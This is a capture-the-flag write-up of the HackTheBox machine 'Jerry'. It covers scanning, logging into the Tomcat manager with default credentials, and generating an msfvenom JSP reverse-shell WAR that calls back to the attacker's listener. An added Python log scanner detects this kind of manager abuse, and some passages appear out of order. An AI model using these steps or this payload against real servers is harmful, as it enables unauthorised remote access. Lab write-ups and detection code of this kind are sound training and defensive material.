Jerry

Jerry writeup by Thamizhiniyan C S


Last updated 1 year ago


Overview

Hello everyone. In this writeup we are going to solve Jerry from HackTheBox.

Link for the machine: https://app.hackthebox.com/machines/Jerry

Let's Start 🙌

Connect to the HTB server by using the OpenVPN configuration file that’s generated by HTB.

[ Click Here to learn more about how to connect to the VPN and access the boxes. ]

After connecting to the VPN service, click on Join Machine to access the machine’s IP.

After joining the machine you can see the IP Address of the target machine.


Reconnaissance

Rustscan

First start the reconnaissance by running rustscan on the target IP address.

Command: rustscan -a 10.10.10.95 -- -A -T4 -v -Pn

Results

From the rustscan results, we can see that an Apache Tomcat service is running on port 8080.


Information Gathering - Port 8080

I visited the web server running on http://10.10.10.95:8080/.

We can see the default home page of the Apache Tomcat server. I started exploring by clicking all the buttons and links on the home page.

On investigating the Manager App URL (http://10.10.10.95:8080/manager/html), I found the Tomcat page on HackTricks.


Enumeration - Port 8080

I tried the admin:admin combination in the prompt and it threw the following error:

From the above error page, we can see that it shows an example which uses the tomcat:s3cret combination. Let’s give this combination a try.

It worked and we got access to the Application Manager.

Browsing the Application Manager further, we can see that there is an option to upload files of type WAR.


Initial Access

We can generate a reverse shell with msfvenom and upload it as mentioned on the Tomcat page on HackTricks.

Generate the Reverse Shell using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HTB_tun_IP> LPORT=8888 -f war -o revshell.war

Now upload this revshell.war file and click deploy.

Now if we check the Applications table, we can see that a new path /revshell is generated.

Before clicking or viewing the /revshell link, start a netcat listener on your attack box / local machine on port 8888.

Now click the /revshell link and check the netcat listener.

We have successfully got access to the target machine.
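
From the defender's side, the manager login and WAR deployment described above leave traces in Tomcat's access log. The following is an added example, not part of the original writeup, that scans log lines in the AccessLogValve "common" format for repeated manager login failures followed by a success, and for application deployments through the manager. The sample log lines, IP addresses, nonce value and function name are constructed for illustration, and the check also covers the manager's text interface, which the writeup does not use.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Manager endpoints that deploy an application (HTML upload form, text interface)
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample log lines (documentation IP ranges, placeholder nonce)
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 11398
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2536
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2536
192.0.2.10 - tomcat [01/Jan/2024:10:00:20 +0000] "GET /manager/html HTTP/1.1" 200 17321
192.0.2.10 - tomcat [01/Jan/2024:10:01:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 19874
192.0.2.10 - - [01/Jan/2024:10:01:30 +0000] "GET /revshell/ HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 15432
"""


def find_manager_abuse(log_text, min_failures=2):
    """Return alerts as (kind, client_ip, user) tuples, in log order."""
    alerts = []
    failures = defaultdict(int)  # client IP -> 401s on /manager since last success
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # line is not in the common pattern
        ip, user, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if not path.startswith("/manager/"):
            continue
        if status == "401":
            failures[ip] += 1  # a single 401 is the normal Basic auth challenge
            continue
        if status == "200" and user != "-":
            if failures[ip] >= min_failures:
                alerts.append(("login_after_failures", ip, user))
            failures[ip] = 0
            if method in ("POST", "PUT") and path in DEPLOY_PATHS:
                alerts.append(("war_deploy", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in find_manager_abuse(SAMPLE_LOG):
        print(alert)
```

On a hardened server the manager application is either removed or restricted to trusted addresses, so any `war_deploy` alert from an unexpected client is worth investigating.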


Getting the Flags

Now we have to look for the flags. I started browsing the machine. I visited the C:\Users directory and found the following users:

I checked the Administrator directory. In the Desktop folder of Administrator, I found the flags directory.

The flags directory had a file named 2 for the price of 1.txt.

You can view the contents of the 2 for the price of 1.txt file using the command: more "2 for the price of 1.txt"

We have successfully found both the user and root flags.

Thank You !!!!!!!

I clicked the Manager App button and it redirected me to the following link: http://10.10.10.95:8080/manager/html, which prompted me for a username and password.

Machine link: https://app.hackthebox.com/machines/Jerry

Reference: Tomcat (HackTricks)